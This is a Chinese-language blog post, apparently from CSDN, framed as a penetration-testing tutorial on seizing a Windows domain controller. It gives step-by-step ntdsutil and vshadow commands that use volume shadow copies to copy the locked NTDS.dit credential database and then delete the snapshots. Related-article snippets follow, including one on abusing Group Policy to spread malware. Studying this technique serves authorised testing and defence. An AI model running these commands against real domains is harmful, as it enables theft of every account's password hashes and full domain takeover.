渗透测试——卷影复制服务下载NTDS.dit(拿到域控)

已于 2024-06-19 13:16:06 修改
阅读量164 收藏 3
点赞数 5
文章标签: windows 网络安全 服务器
于 2024-06-16 21:27:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74171325/article/details/139725966
版权

目录

NTDS.dit获取

方式一(卷影复制服务)相当于快照

方法二(利用工具vshadow工具,原理也是卷影)

NTDS.dit获取

在域控的情况下,由于ntds.dit在使用,所以它不能进行移动下载到桌面更不能拿出来,下面解释两种方式

方式一(卷影复制服务)相当于快照

 ntdsutil按步骤执行命令创建快照

# 进入ntdsutil命令行
ntdsutil

# 进入快照
snapshot

# 激活 AD DS 实例
activate instance ntds

create
mount {GUID}
copy C:\$SNAP_202406162052_VOLUMEC$\Windows\NTDS\ntds.dit c:\ntds.dit  #可用可不用

# copy 完之后再执行快照删除操作
unmount {GUID}
del {GUID}

 出现和C盘一样的快照,这样就可以进快照获取ntds.dit了

方法二(利用工具vshadow工具,原理也是卷影)

vshadow.exe -p -nw C:

参数说明:

-p persistent,备份操作,重启系统不会删除

-nw no writers,用来提高创建速度

C: 对应c盘

 记住这三信息Shadow copy device name、SnapshotSetID、SNAPSHOT ID

copy [Shadow copy device name]\windows\ntds\ntds.dit c:\ntds.dit

 成功获取到,可以进行下载

vshadow -dx={SnapshotSetID}

vshadow -ds={SNAPSHOT ID}

peiqi_crazy
关注
  • 5
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
卷影复制替代品 ShadowExplorer v0.9
10-27
一个Windows卷影复制的替代品,现在就下载较新版的ShadowExplorer,体验更简单的卷影复制
win10系统卷影复制服务器,卷影复制Windows 10与全能备份软件
weixin_28872105的博客
08-06 4497
什么是卷影复制卷影复制(也称为快照服务或VSS)是微软Windows系统中包含的一项技术。无论电脑是否正在使用,它都可以使你获取电脑文件或卷的备份副本或快照。在此过程中,它需要VSS服务、VSS请求者、VSS编写器、VSS提供程序。重要的是,该过程可以手动进行或设置自动进行。你可以使用VSS技术在本地和外部卷上创建卷影副本。在Windows 7中,你可以通过“备份和还原”或“系统还原点”创建一个...
转载-卷影复制服务(VSS)详细介绍
gonglei155的博客
02-03 8249
http://www.codeclip.com/1329.html 本文中内容是参考以下内容整理而成: 1.学习笔记29:Volume Shadow Copy Service(VSS)如何工作 — Windows Live 2.卷影拷贝服务_百度百科 3.卷影复制服务(VSS)原理介绍|IT168 存储 4.VSS(卷影拷贝服务)与snapshot优缺点及区别 – TL的专栏 – CSDN博客 5...
linux卷影复制功能,vssadmin 卷影复制服务管理命令行工具
weixin_42513944的博客
05-15 868
C:\Users\xinyong>vssadminvssadmin 1.1 - 卷影复制服务管理命令行工具(C) 版权所有 2001-2005 Microsoft Corp.错误: 无效命令。---- 支持的命令 ----Delete Shadows - 删除卷影副本List Providers - 列出已注册的卷影副本提供程序List Shadows ...
渗透测试——NinjaCopy工具解析NTFS来复制NTDS.dit拿到域控
weixin_74171325的博客
06-19 364
Invoke-NinjaCopy,一个 Powershell脚本,能够通过获取卷的读取句柄并解析 NTFS 来复制NTDS.dit、注册表配置单元和位于 NTFS 卷上的任何其他文件。这不需要提升到 SYSTEM、注入到SYSTEM 进程或启动新服务/可疑程序。获取代码,将代码进行保存。
渗透测试——内网环境分析
weixin_74171325的博客
06-01 1123
参考蚁景文章学习后打写的
咋搭建域控服务器,Active Directory虚拟机搭建域控服务器环境
weixin_39699912的博客
07-31 1796
前言还是和上一章一样,痛苦过后还是记录下给后来人提供便利为妙。虚拟机选择:建议Hyper-V或者VMware系统选择:建议WIindows Server 2003及以上我这里是使用VMware Workstation Pro,Windows server 2012 R2系统。虚拟机网络的配置1.查看VMware【虚拟网络编辑器】,主要查看【NAT模式】。我这里:NAT模式,VMnet8网络,IP:...
渗透安全测试
热门推荐
龙卷风摧毁停车场
10-09 1万+
CTF 内网攻防 ssh私钥泄漏 信息探测 -nmap -sV 目标IP 1.分析端口,针对特殊端口进行探测,对开放大端口的http服务进行排查 2.针对http服务可以使用web进行测试http://ip:port 3.右键查看网页源代码 4.使用工具dirb http://ip:port/ 对服务的隐藏文件进行探测 查看敏感醒目的文件名进行访问可能会获取flag值 可以直接下载ssh私钥,进行配对,进入ssh文件夹下的私钥文件,关键名文件进行下载 给私钥可读可写权限,进入关键名文件下查看用户名等敏感信
我所了解的内网渗透——内网渗透知识大总结
2401_84466316的博客
04-23 575
组策略使管理员能够管理Active Directory中的计算机和用户。组策略保存为组策略对象(GPO)攻击者可以滥用GPO,通过欺诈方式进一步自动化地传播恶意软件、实现持久化驻留目的恶意软件可以利用GPO穿越IDS/IPS等防火墙,最终访问到域内所有的系统。GPO的另一优点就是攻击过程期间并不需要目标系统在线,一旦离线状态下的目标系统重新登录到域中,恶意的GPO载荷就会被投递到目标系统。组策略默认情况下每90分钟(域控制器5分钟)可包括安全选项,注册表项。
域控服务器删除后父域控服务器.docx
12-31
2. **清理操作**:使用`connections`命令连接到要删除的域控NTDS数据库,然后选择`files`来指定NTDS数据库和日志文件的位置。 3. **清除信息**:通过`abandon metadata cleanup`命令清除域控制器的元数据。这将从...
域控服务器备份和恢复.pdf
05-19
3. **AD和DNS服务备份**:AD数据库包含Ntds.dit(数据库)、Edbxxxx.log(事务日志)、Edb.chk(检查点文件)及Res1.log和Res2.log(预留日志文件)。SYSVOL包含登录脚本、策略对象和需要同步的文件。这些内容应与...
域控服务器备份和恢复.doc
09-30
其中,AD数据库由Ntds.dit(主数据库)、Edbxxxxx.log(事务日志)、Edb.chk(检查点文件)、Res1.log和Res2.log(预留日志文件)组成。SYSVOL包含文件系统连接、Net Logon共享、用户登录脚本和组策略对象。 备份...
Windows 服务器管理阶段测试题doc.docx
05-06
Windows 服务器管理阶段测试题解析】 1. Windows 2003 域环境下的远程访问服务控制:为了设置用户“通过远程访问策略控制访问”,必须确保用户账户属于 RemoteUsers 组。因此,正确的解决方案是C. 把需要设置拨入...
域渗透-域控维权
m0_58596609的博客
11-19 2074
域渗透-域控维权
Java小技能:多级组织机构排序并返回树结构(包含每个层级的子节点和业务数据集合)
iOS逆向与安全
07-17 1163
包含每个层级的子节点和业务数据集合。
Python 基础——元组
hpz3292887609的博客
07-16 348
3.元组类型定义时重要的是“ , ” ,创建和访问一个元组。+ : 拼接,左右的类型必须。and or 逻辑操作符。5.元组相关的操作符一致。#该代码会显示运行错误。4.更新和删除一个元组。
Qt创建列表,通过外部按钮控制列表的选中下移、上移以及左侧图标的显现
最新发布
肩上风骋的博客
07-17 624
项目中需要使用列表QListWidget,但是不能直接拿来使用。需要创建一个列表,通过向上和向下的按钮来向上或者向下移动选中列表项,当当前项背选中再去点击确认按钮,会在列表项的前面出现一个图标。
怎么解析NTDS.dit
04-27
NTDS.ditWindows操作系统中Active Directory数据库文件的一部分。要解析NTDS.dit文件,可以使用工具如dsdbutil、ntdsutil和esentutl等。这些工具可以帮助管理员执行各种操作,例如备份和还原数据库、重建索引、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

peiqi_crazy

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值